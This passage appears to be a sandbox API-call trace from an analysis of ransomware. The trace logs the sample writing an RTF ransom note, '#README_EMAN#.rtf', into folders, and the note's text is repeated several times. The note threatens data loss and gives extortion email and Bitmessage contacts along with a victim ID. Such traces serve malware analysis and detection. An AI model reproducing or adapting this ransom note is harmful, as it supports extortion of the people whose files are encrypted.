decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nw̵\x94#Vç\x9f\x04Û\x03 6WZ\x83©{\x93Y(Á~\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.453] WriteFile (in: hFile=0x2ec, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.454] CloseHandle (hObject=0x2ec) returned 1 [0298.454] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\#readme_eman#.rtf")) returned 0xffffffff [0298.454] GetLastError () returned 0x2 [0298.454] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0298.455] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.455] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.455] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED 